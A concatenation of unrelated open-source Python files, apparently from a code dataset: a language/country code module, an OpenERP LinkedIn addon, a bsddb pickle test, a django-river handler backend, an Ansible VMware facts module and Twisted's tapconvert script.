('sas', '', '', u'Sasak', u'sasak'),
('sat', '', '', u'Santali', u'santal'),
('scn', '', '', u'Sicilian', u'sicilien'),
('sco', '', '', u'Scots', u'écossais'),
('sel', '', '', u'Selkup', u'selkoupe'),
('sem', '', '', u'Semitic languages', u'sémitiques, langues'),
('sga', '', '', u'Irish, Old (to 900)', u'irlandais ancien (jusqu\'à 900)'),
('sgn', '', '', u'Sign Languages', u'langues des signes'),
('shn', '', '', u'Shan', u'chan'),
('sid', '', '', u'Sidamo', u'sidamo'),
('sin', '', 'si', u'Sinhala; Sinhalese', u'singhalais'),
('sio', '', '', u'Siouan languages', u'sioux, langues'),
('sit', '', '', u'Sino-Tibetan languages', u'sino-tibétaines, langues'),
('sla', '', '', u'Slavic languages', u'slaves, langues'),
('slo', 'slk', 'sk', u'Slovak', u'slovaque'),
('slv', '', 'sl', u'Slovenian', u'slovène'),
('sma', '', '', u'Southern Sami', u'sami du Sud'),
('sme', '', 'se', u'Northern Sami', u'sami du Nord'),
('smi', '', '', u'Sami languages', u'sames, langues'),
('smj', '', '', u'Lule Sami', u'sami de Lule'),
('smn', '', '', u'Inari Sami', u'sami d\'Inari'),
('smo', '', 'sm', u'Samoan', u'samoan'),
('sms', '', '', u'Skolt Sami', u'sami skolt'),
('sna', '', 'sn', u'Shona', u'shona'),
('snd', '', 'sd', u'Sindhi', u'sindhi'),
('snk', '', '', u'Soninke', u'soninké'),
('sog', '', '', u'Sogdian', u'sogdien'),
('som', '', 'so', u'Somali', u'somali'),
('son', '', '', u'Songhai languages', u'songhai, langues'),
('sot', '', 'st', u'Sotho, Southern', u'sotho du Sud'),
('spa', '', 'es', u'Spanish; Castilian', u'espagnol; castillan'),
('srd', '', 'sc', u'Sardinian', u'sarde'),
('srn', '', '', u'Sranan Tongo', u'sranan tongo'),
('srp', '', 'sr', u'Serbian', u'serbe'),
('srr', '', '', u'Serer', u'sérère'),
('ssa', '', '', u'Nilo-Saharan languages', u'nilo-sahariennes, langues'),
('ssw', '', 'ss', u'Swati', u'swati'),
('suk', '', '', u'Sukuma', u'sukuma'),
('sun', '', 'su', u'Sundanese', u'soundanais'),
('sus', '', '', u'Susu', u'soussou'),
('sux', '', '', u'Sumerian', u'sumérien'),
('swa', '', 'sw', u'Swahili', u'swahili'),
('swe', '', 'sv', u'Swedish', u'suédois'),
('syc', '', '', u'Classical Syriac', u'syriaque classique'),
('syr', '', '', u'Syriac', u'syriaque'),
('tah', '', 'ty', u'Tahitian', u'tahitien'),
('tai', '', '', u'Tai languages', u'tai, langues'),
('tam', '', 'ta', u'Tamil', u'tamoul'),
('tat', '', 'tt', u'Tatar', u'tatar'),
('tel', '', 'te', u'Telugu', u'télougou'),
('tem', '', '', u'Timne', u'temne'),
('ter', '', '', u'Tereno', u'tereno'),
('tet', '', '', u'Tetum', u'tetum'),
('tgk', '', 'tg', u'Tajik', u'tadjik'),
('tgl', '', 'tl', u'Tagalog', u'tagalog'),
('tha', '', 'th', u'Thai', u'thaï'),
('tib', 'bod', 'bo', u'Tibetan', u'tibétain'),
('tig', '', '', u'Tigre', u'tigré'),
('tir', '', 'ti', u'Tigrinya', u'tigrigna'),
('tiv', '', '', u'Tiv', u'tiv'),
('tkl', '', '', u'Tokelau', u'tokelau'),
('tlh', '', '', u'Klingon; tlhIngan-Hol', u'klingon'),
('tli', '', '', u'Tlingit', u'tlingit'),
('tmh', '', '', u'Tamashek', u'tamacheq'),
('tog', '', '', u'Tonga (Nyasa)', u'tonga (Nyasa)'),
('ton', '', 'to', u'Tonga (Tonga Islands)', u'tongan (Îles Tonga)'),
('tpi', '', '', u'Tok Pisin', u'tok pisin'),
('tsi', '', '', u'Tsimshian', u'tsimshian'),
('tsn', '', 'tn', u'Tswana', u'tswana'),
('tso', '', 'ts', u'Tsonga', u'tsonga'),
('tuk', '', 'tk', u'Turkmen', u'turkmène'),
('tum', '', '', u'Tumbuka', u'tumbuka'),
('tup', '', '', u'Tupi languages', u'tupi, langues'),
('tur', '', 'tr', u'Turkish', u'turc'),
('tut', '', '', u'Altaic languages', u'altaïques, langues'),
('tvl', '', '', u'Tuvalu', u'tuvalu'),
('twi', '', 'tw', u'Twi', u'twi'),
('tyv', '', '', u'Tuvinian', u'touva'),
('udm', '', '', u'Udmurt', u'oudmourte'),
('uga', '', '', u'Ugaritic', u'ougaritique'),
('uig', '', 'ug', u'Uighur; Uyghur', u'ouïgour'),
('ukr', '', 'uk', u'Ukrainian', u'ukrainien'),
('umb', '', '', u'Umbundu', u'umbundu'),
('und', '', '', u'Undetermined', u'indéterminée'),
('urd', '', 'ur', u'Urdu', u'ourdou'),
('uzb', '', 'uz', u'Uzbek', u'ouzbek'),
('vai', '', '', u'Vai', u'vaï'),
('ven', '', 've', u'Venda', u'venda'),
('vie', '', 'vi', u'Vietnamese', u'vietnamien'),
('vol', '', 'vo', u'Volapük', u'volapük'),
('vot', '', '', u'Votic', u'vote'),
('wak', '', '', u'Wakashan languages', u'wakashanes, langues'),
('wal', '', '', u'Walamo', u'walamo'),
('war', '', '', u'Waray', u'waray'),
('was', '', '', u'Washo', u'washo'),
('wel', 'cym', 'cy', u'Welsh', u'gallois'),
('wen', '', '', u'Sorbian languages', u'sorabes, langues'),
('wln', '', 'wa', u'Walloon', u'wallon'),
('wol', '', 'wo', u'Wolof', u'wolof'),
('xal', '', '', u'Kalmyk; Oirat', u'kalmouk; oïrat'),
('xho', '', 'xh', u'Xhosa', u'xhosa'),
('yao', '', '', u'Yao', u'yao'),
('yap', '', '', u'Yapese', u'yapois'),
('yid', '', 'yi', u'Yiddish', u'yiddish'),
('yor', '', 'yo', u'Yoruba', u'yoruba'),
('ypk', '', '', u'Yupik languages', u'yupik, langues'),
('zap', '', '', u'Zapotec', u'zapotèque'),
('zbl', '', '', u'Blissymbols; Blissymbolics; Bliss', u'symboles Bliss; Bliss'),
('zen', '', '', u'Zenaga', u'zenaga'),
('zha', '', 'za', u'Zhuang; Chuang', u'zhuang; chuang'),
('znd', '', '', u'Zande languages', u'zandé, langues'),
('zul', '', 'zu', u'Zulu', u'zoulou'),
('zun', '', '', u'Zuni', u'zuni'),
('zza', '', '', u'Zaza; Dimili; Dimli; Kirdki; Kirmanjki; Zazaki', u'zaza; dimili; dimli; kirdki; kirmanjki; zazaki')]
class Country(object):
"""Country according to ISO-3166
:param string country: country name, alpha2 code, alpha3 code or numeric code
:param list countries: all countries
:type countries: see :data:`~subliminal.language.COUNTRIES`
"""
def __init__(self, country, countries=None):
countries = countries or COUNTRIES
country = to_unicode(country.strip().lower())
country_tuple = None
# Try to find the country
if len(country) == 2:
country_tuple = dict((c[0].lower(), c) for c in countries).get(country)
elif len(country) == 3 and not country.isdigit():
country_tuple = dict((c[1].lower(), c) for c in countries).get(country)
elif len(country) == 3 and country.isdigit():
country_tuple = dict((c[2].lower(), c) for c in countries).get(country)
if country_tuple is None:
country_tuple = dict((c[3].lower(), c) for c in countries).get(country)
# Raise ValueError if nothing is found
if country_tuple is None:
raise ValueError('Country %s does not exist' % country)
# Set default attrs
self.alpha2 = country_tuple[0]
self.alpha3 = country_tuple[1]
self.numeric = country_tuple[2]
self.name = country_tuple[3]
def __hash__(self):
return hash(self.alpha3)
def __eq__(self, other):
if isinstance(other, Country):
return self.alpha3 == other.alpha3
return False
def __ne__(self, other):
return not self == other
def __unicode__(self):
return self.name
def __str__(self):
return unicode(self).encode('utf-8')
def __repr__(self):
return 'Country(%s)' % self
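# Illustrative usage sketch (editorial addition, not part of the original
# subliminal module); it relies on the COUNTRIES table defined earlier in this
# file. A country can be resolved from any of the four columns of that table:
#   Country('fr')        # alpha2 code
#   Country('fra')       # alpha3 code
#   Country('250')       # numeric code (assuming '250' is how the table stores it)
#   Country('france')    # full name, case-insensitive
# All of these compare equal, since Country.__eq__ only compares alpha3.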
class Language(object):
"""Language according to ISO-639
    :param string language: language name (English or French), alpha2 code, alpha3 code, terminologic code or numeric code, optionally with a country
:param country: country of the language
:type country: :class:`Country` or string
:param languages: all languages
:type languages: see :data:`~subliminal.language.LANGUAGES`
:param countries: all countries
:type countries: see :data:`~subliminal.language.COUNTRIES`
:param bool strict: whether to raise a ValueError on unknown language or not
:class:`Language` implements the inclusion test, with the ``in`` keyword::
>>> Language('pt-BR') in Language('pt') # Portuguese (Brazil) is included in Portuguese
True
>>> Language('pt') in Language('pt-BR') # Portuguese is not included in Portuguese (Brazil)
False
"""
    with_country_regexps = [re.compile(r'(.*)\((.*)\)'), re.compile(r'(.*)[-_](.*)')]
def __init__(self, language, country=None, languages=None, countries=None, strict=True):
languages = languages or LANGUAGES
countries = countries or COUNTRIES
# Get the country
self.country = None
if isinstance(country, Country):
self.country = country
elif isinstance(country, basestring):
try:
self.country = Country(country, countries)
except ValueError:
logger.warning(u'Country %s could not be identified' % country)
if strict:
raise
# Language + Country format
#TODO: Improve this part
if country is None:
for regexp in [r.match(language) for r in self.with_country_regexps]:
if regexp:
language = regexp.group(1)
try:
self.country = Country(regexp.group(2), countries)
except ValueError:
logger.warning(u'Country %s could not be identified' % country)
if strict:
raise
break
# Try to find the language
language = to_unicode(language.strip().lower())
language_tuple = None
if len(language) == 2:
language_tuple = dict((l[2].lower(), l) for l in languages).get(language)
elif len(language) == 3:
language_tuple = dict((l[0].lower(), l) for l in languages).get(language)
if language_tuple is None:
language_tuple = dict((l[1].lower(), l) for l in languages).get(language)
if language_tuple is None:
language_tuple = dict((l[3].split('; ')[0].lower(), l) for l in languages).get(language)
if language_tuple is None:
language_tuple = dict((l[4].split('; ')[0].lower(), l) for l in languages).get(language)
# Raise ValueError if strict or continue with Undetermined
if language_tuple is None:
if strict:
raise ValueError('Language %s does not exist' % language)
language_tuple = dict((l[0].lower(), l) for l in languages).get('und')
# Set attributes
self.alpha2 = language_tuple[2]
self.alpha3 = language_tuple[0]
self.terminologic = language_tuple[1]
self.name = language_tuple[3]
self.french_name = language_tuple[4]
def __hash__(self):
if self.country is None:
return hash(self.alpha3)
return hash(self.alpha3 + self.country.alpha3)
def __eq__(self, other):
if isinstance(other, Language):
return self.alpha3 == other.alpha3 and self.country == other.country
return False
def __contains__(self, item):
if isinstance(item, Language):
if self == item:
return True
if self.country is None:
return self.alpha3 == item.alpha3
return False
def __ne__(self, other):
return not self == other
def __nonzero__(self):
return self.alpha3 != 'und'
def __unicode__(self):
if self.country is None:
return self.name
return '%s (%s)' % (self.name, self.country)
def __str__(self):
return unicode(self).encode('utf-8')
def __repr__(self):
if self.country is None:
return 'Language(%s)' % self.name.encode('utf-8')
return 'Language(%s, country=%s)' % (self.name.encode('utf-8'), self.country)
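# Illustrative usage sketch (editorial addition, not part of the original module).
# Language accepts any code column or name from the LANGUAGES table above, and an
# optional country, either passed explicitly or embedded in the string:
#   Language('en')                # alpha2 code
#   Language('eng')               # bibliographic alpha3 code
#   Language('English')           # English name
#   Language('anglais')           # French name
#   Language('pt-BR')             # language + country, split by with_country_regexps
#   Language('xx', strict=False)  # unknown values degrade to Undetermined ('und')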
class language_set(set):
"""Set of :class:`Language` with some specificities.
:param iterable: where to take elements from
:type iterable: iterable of :class:`Languages <Language>` or string
:param languages: all languages
:type languages: see :data:`~subliminal.language.LANGUAGES`
:param bool strict: whether to raise a ValueError on invalid language or not
The following redefinitions are meant to reflect the inclusion logic in :class:`Language`
* Inclusion test, with the ``in`` keyword
* Intersection
    * Subtraction
Here is an illustration of the previous points::
>>> Language('en') in language_set(['en-US', 'en-CA'])
False
>>> Language('en-US') in language_set(['en', 'fr'])
True
>>> language_set(['en']) & language_set(['en-US', 'en-CA'])
language_set([Language(English, country=Canada), Language(English, country=United States)])
>>> language_set(['en-US', 'en-CA', 'fr']) - language_set(['en'])
language_set([Language(French)])
"""
def __init__(self, iterable=None, languages=None, strict=True):
iterable = iterable or []
languages = languages or LANGUAGES
items = []
for i in iterable:
if isinstance(i, Language):
items.append(i)
continue
if isinstance(i, tuple):
items.append(Language(i[0], languages=languages, strict=strict))
continue
items.append(Language(i, languages=languages, strict=strict))
super(language_set, self).__init__(items)
def __contains__(self, item):
for i in self:
if item in i:
return True
return super(language_set, self).__contains__(item)
def __and__(self, other):
results = language_set()
for i in self:
for j in other:
if i in j:
results.add(i)
for i in other:
for j in self:
if i in j:
results.add(i)
return results
def __sub__(self, other):
results = language_set()
for i in self:
if i not in other:
results.add(i)
return results
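# Illustrative note (editorial addition): the overridden __contains__, __and__ and
# __sub__ above apply Language inclusion rather than plain set equality, e.g.
#   language_set(['en', 'fr']) & language_set(['en-US'])
# keeps Language('en-US'), because 'en-US' is included in 'en' (see
# Language.__contains__).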
class language_list(list):
"""List of :class:`Language` with some specificities.
:param iterable: where to take elements from
:type iterable: iterable of :class:`Languages <Language>` or string
:param languages: all languages
:type languages: see :data:`~subliminal.language.LANGUAGES`
:param bool strict: whether to raise a ValueError on invalid language or not
The following redefinitions are meant to reflect the inclusion logic in :class:`Language`
* Inclusion test, with the ``in`` keyword
* Index
Here is an illustration of the previous points::
>>> Language('en') in language_list(['en-US', 'en-CA'])
False
>>> Language('en-US') in language_list(['en', 'fr-BE'])
True
>>> language_list(['en', 'fr-BE']).index(Language('en-US'))
0
"""
def __init__(self, iterable=None, languages=None, strict=True):
iterable = iterable or []
languages = languages or LANGUAGES
items = []
for i in iterable:
if isinstance(i, Language):
items.append(i)
continue
if isinstance(i, tuple):
items.append(Language(i[0], languages=languages, strict=strict))
continue
items.append(Language(i, languages=languages, strict=strict))
super(language_list, self).__init__(items)
def __contains__(self, item):
for i in self:
if item in i:
return True
return super(language_list, self).__contains__(item)
def index(self, x, strict=False):
if not strict:
for i in range(len(self)):
if x in self[i]:
return i
return super(language_list, self).index(x)
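# Illustrative note (editorial addition): with strict=False (the default),
# index() returns the position of the first element that includes x, so
#   language_list(['en', 'fr']).index(Language('en-US'))  # -> 0
# while index(x, strict=True) keeps the exact semantics of list.index.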
| gpl-3.0 | 5,969,076,717,839,732,000 | 51.110687 | 184 | 0.444847 | false |
dkodnik/arp | addons/web_linkedin/web_linkedin.py | 2 | 4484 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import urllib2
from urlparse import urlparse, urlunparse
import openerp
import openerp.addons.web
from openerp.osv import fields, osv
class Binary(openerp.http.Controller):
@openerp.http.route('/web_linkedin/binary/url2binary', type='json', auth='user')
def url2binary(self, url):
"""Used exclusively to load images from LinkedIn profiles, must not be used for anything else."""
_scheme, _netloc, path, params, query, fragment = urlparse(url)
        # media.licdn.com is the domain LinkedIn serves profile media from (replicated to CDNs),
        # so forcing it should always work and prevents abusing this method to load arbitrary URLs
url = urlunparse(('http', 'media.licdn.com', path, params, query, fragment))
bfile = urllib2.urlopen(url)
return base64.b64encode(bfile.read())
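# Illustrative note (editorial addition, not part of the original module): the
# /web_linkedin/binary/url2binary JSON route above is meant to be called by the
# web client with the URL of a LinkedIn profile picture; whatever host the URL
# carries, it is rewritten to media.licdn.com before fetching, and the image is
# returned base64-encoded. The exact client-side call shape is an assumption here.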
class web_linkedin_settings(osv.osv_memory):
_inherit = 'sale.config.settings'
_columns = {
'api_key': fields.char(string="API Key", size=50),
'server_domain': fields.char(size=100),
}
def get_default_linkedin(self, cr, uid, fields, context=None):
key = self.pool.get("ir.config_parameter").get_param(cr, uid, "web.linkedin.apikey") or ""
dom = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
return {'api_key': key, 'server_domain': dom,}
def set_linkedin(self, cr, uid, ids, context=None):
key = self.browse(cr, uid, ids[0], context)["api_key"] or ""
self.pool.get("ir.config_parameter").set_param(cr, uid, "web.linkedin.apikey", key)
class web_linkedin_fields(osv.Model):
_inherit = 'res.partner'
def _get_url(self, cr, uid, ids, name, arg, context=None):
res = dict((id, False) for id in ids)
for partner in self.browse(cr, uid, ids, context=context):
res[partner.id] = partner.linkedin_url
return res
def linkedin_check_similar_partner(self, cr, uid, linkedin_datas, context=None):
res = []
res_partner = self.pool.get('res.partner')
for linkedin_data in linkedin_datas:
partner_ids = res_partner.search(cr, uid, ["|", ("linkedin_id", "=", linkedin_data['id']),
"&", ("linkedin_id", "=", False),
"|", ("name", "ilike", linkedin_data['firstName'] + "%" + linkedin_data['lastName']), ("name", "ilike", linkedin_data['lastName'] + "%" + linkedin_data['firstName'])], context=context)
if partner_ids:
partner = res_partner.read(cr, uid, partner_ids[0], ["image", "mobile", "phone", "parent_id", "name", "email", "function", "linkedin_id"], context=context)
if partner['linkedin_id'] and partner['linkedin_id'] != linkedin_data['id']:
partner.pop('id')
if partner['parent_id']:
partner['parent_id'] = partner['parent_id'][0]
for key, val in partner.items():
if not val:
partner.pop(key)
res.append(partner)
else:
res.append({})
return res
_columns = {
'linkedin_id': fields.char(string="LinkedIn ID", size=50),
'linkedin_url': fields.char(string="LinkedIn url", size=100, store=True),
'linkedin_public_url': fields.function(_get_url, type='text', string="LinkedIn url",
help="This url is set automatically when you join the partner with a LinkedIn account."),
}
| agpl-3.0 | -8,493,009,703,946,995,000 | 47.73913 | 204 | 0.600803 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-2.5/Lib/bsddb/test/test_pickle.py | 11 | 2172 |
import sys, os, string
import pickle
try:
import cPickle
except ImportError:
cPickle = None
import unittest
import glob
try:
# For Pythons w/distutils pybsddb
from bsddb3 import db
except ImportError, e:
# For Python 2.3
from bsddb import db
#----------------------------------------------------------------------
class pickleTestCase(unittest.TestCase):
"""Verify that DBError can be pickled and unpickled"""
db_home = 'db_home'
db_name = 'test-dbobj.db'
def setUp(self):
homeDir = os.path.join(os.path.dirname(sys.argv[0]), 'db_home')
self.homeDir = homeDir
try: os.mkdir(homeDir)
except os.error: pass
def tearDown(self):
if hasattr(self, 'db'):
del self.db
if hasattr(self, 'env'):
del self.env
files = glob.glob(os.path.join(self.homeDir, '*'))
for file in files:
os.remove(file)
def _base_test_pickle_DBError(self, pickle):
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_CREATE | db.DB_INIT_MPOOL)
self.db = db.DB(self.env)
self.db.open(self.db_name, db.DB_HASH, db.DB_CREATE)
self.db.put('spam', 'eggs')
assert self.db['spam'] == 'eggs'
try:
self.db.put('spam', 'ham', flags=db.DB_NOOVERWRITE)
except db.DBError, egg:
pickledEgg = pickle.dumps(egg)
#print repr(pickledEgg)
rottenEgg = pickle.loads(pickledEgg)
if rottenEgg.args != egg.args or type(rottenEgg) != type(egg):
raise Exception, (rottenEgg, '!=', egg)
else:
raise Exception, "where's my DBError exception?!?"
self.db.close()
self.env.close()
def test01_pickle_DBError(self):
self._base_test_pickle_DBError(pickle=pickle)
if cPickle:
def test02_cPickle_DBError(self):
self._base_test_pickle_DBError(pickle=cPickle)
#----------------------------------------------------------------------
def test_suite():
return unittest.makeSuite(pickleTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| mit | 7,992,853,783,927,926,000 | 27.96 | 74 | 0.555709 | false |
mstzn36/django-river | river/handlers/backends/memory.py | 2 | 1275 | import logging
from river.handlers.backends.base import BaseHandlerBackend, powerset
__author__ = 'ahmetdal'
LOGGER = logging.getLogger(__name__)
class MemoryHandlerBackend(BaseHandlerBackend):
def __init__(self):
self.handlers = {}
def register(self, handler_cls, handler, workflow_object, field, override=False, *args, **kwargs):
hash = self.get_handler_class_prefix(handler_cls) + handler_cls.get_hash(workflow_object, field, *args, **kwargs)
if override or hash not in self.handlers:
self.handlers[hash] = handler
LOGGER.debug("Handler '%s' is registered in memory as method '%s' and module '%s'. " % (hash, handler.__name__, handler.__module__))
return hash
def get_handlers(self, handler_cls, workflow_object, field, *args, **kwargs):
handlers = []
for c in powerset(kwargs.keys()):
skwargs = {}
for f in c:
skwargs[f] = kwargs.get(f)
hash = self.get_handler_class(handler_cls).get_hash(workflow_object, field, **skwargs)
handler = self.handlers.get(self.get_handler_class_prefix(self.get_handler_class(handler_cls)) + hash)
if handler:
handlers.append(handler)
return handlers
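# Illustrative sketch (editorial addition, not part of django-river): get_handlers
# hashes every subset of the supplied kwargs (via powerset) and looks each hash up
# in self.handlers, so a handler registered with fewer keyword arguments is still
# found when the lookup passes extra ones. Hypothetical names:
#   backend.register(SomeHandler, my_callback, workflow_object, 'status')
#   backend.get_handlers(SomeHandler, workflow_object, 'status', transition=t)
# The second call still matches, because the empty kwargs subset reproduces the
# hash computed at registration time.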
| gpl-3.0 | -4,589,561,749,836,278,300 | 41.5 | 145 | 0.62902 | false |
kustodian/ansible | lib/ansible/modules/cloud/vmware/_vmware_host_feature_facts.py | 21 | 4460 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_host_feature_facts
deprecated:
removed_in: '2.13'
why: Deprecated in favour of C(_info) module.
alternative: Use M(vmware_host_feature_info) instead.
short_description: Gathers facts about an ESXi host's feature capability information
description:
- This module can be used to gather facts about an ESXi host's feature capability information when ESXi hostname or Cluster name is given.
version_added: 2.8
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster from all host systems to be used for facts gathering.
- If C(esxi_hostname) is not given, this parameter is required.
type: str
esxi_hostname:
description:
- ESXi hostname to gather facts from.
- If C(cluster_name) is not given, this parameter is required.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather feature capability facts about all ESXi Hosts in given Cluster
vmware_host_feature_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: cluster_name
delegate_to: localhost
register: all_cluster_hosts_facts
- name: Check if ESXi is vulnerable for Speculative Store Bypass Disable (SSBD) vulnerability
vmware_host_feature_facts:
hostname: "{{ vcenter_server }}"
username: "{{ vcenter_user }}"
password: "{{ vcenter_pass }}"
validate_certs: no
esxi_hostname: "{{ esxi_hostname }}"
register: features_set
- set_fact:
ssbd : "{{ item.value }}"
loop: "{{ features_set.host_feature_facts[esxi_hostname] |json_query(name) }}"
vars:
name: "[?key=='cpuid.SSBD']"
- assert:
that:
- ssbd|int == 1
when: ssbd is defined
'''
RETURN = r'''
hosts_feature_facts:
description: metadata about host's feature capability information
returned: always
type: dict
sample: {
"10.76.33.226": [
{
"feature_name": "cpuid.3DNOW",
"key": "cpuid.3DNOW",
"value": "0"
},
{
"feature_name": "cpuid.3DNOWPLUS",
"key": "cpuid.3DNOWPLUS",
"value": "0"
},
]
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi
class FeatureCapabilityFactsManager(PyVmomi):
def __init__(self, module):
super(FeatureCapabilityFactsManager, self).__init__(module)
cluster_name = self.params.get('cluster_name', None)
esxi_host_name = self.params.get('esxi_hostname', None)
self.hosts = self.get_all_host_objs(cluster_name=cluster_name, esxi_host_name=esxi_host_name)
def gather_host_feature_facts(self):
host_feature_facts = dict()
for host in self.hosts:
host_feature_capabilities = host.config.featureCapability
capability = []
for fc in host_feature_capabilities:
temp_dict = {
'key': fc.key,
'feature_name': fc.featureName,
'value': fc.value,
}
capability.append(temp_dict)
host_feature_facts[host.name] = capability
return host_feature_facts
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
cluster_name=dict(type='str', required=False),
esxi_hostname=dict(type='str', required=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'esxi_hostname'],
],
supports_check_mode=True,
)
host_capability_manager = FeatureCapabilityFactsManager(module)
module.exit_json(changed=False,
hosts_feature_facts=host_capability_manager.gather_host_feature_facts())
if __name__ == "__main__":
main()
| gpl-3.0 | 2,509,361,652,908,296,000 | 29.340136 | 138 | 0.630269 | false |
hlzz/dotfiles | graphics/VTK-7.0.0/ThirdParty/Twisted/twisted/scripts/tapconvert.py | 2 | 2202 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import sys, getpass
from twisted.python import usage
from twisted.application import app
from twisted.persisted import sob
class ConvertOptions(usage.Options):
synopsis = "Usage: tapconvert [options]"
optParameters = [
['in', 'i', None, "The filename of the tap to read from"],
['out', 'o', None, "A filename to write the tap to"],
['typein', 'f', 'guess',
"The format to use; this can be 'guess', 'python', "
"'pickle', 'xml', or 'source'."],
['typeout', 't', 'source',
"The output format to use; this can be 'pickle', 'xml', or 'source'."],
]
optFlags = [
['decrypt', 'd', "The specified tap/aos/xml file is encrypted."],
['encrypt', 'e', "Encrypt file before writing"]
]
compData = usage.Completions(
optActions={"typein": usage.CompleteList(["guess", "python", "pickle",
"xml", "source"]),
"typeout": usage.CompleteList(["pickle", "xml", "source"]),
"in": usage.CompleteFiles(descr="tap file to read from"),
"out": usage.CompleteFiles(descr="tap file to write to"),
}
)
def postOptions(self):
if self['in'] is None:
raise usage.UsageError("%s\nYou must specify the input filename."
% self)
if self["typein"] == "guess":
try:
self["typein"] = sob.guessType(self["in"])
except KeyError:
raise usage.UsageError("Could not guess type for '%s'" %
self["typein"])
def run():
options = ConvertOptions()
try:
options.parseOptions(sys.argv[1:])
except usage.UsageError, e:
print e
else:
app.convertStyle(options["in"], options["typein"],
options.opts['decrypt'] or getpass.getpass('Passphrase: '),
options["out"], options['typeout'], options["encrypt"])
| bsd-3-clause | -3,698,512,672,166,080,000 | 36.631579 | 80 | 0.509991 | false |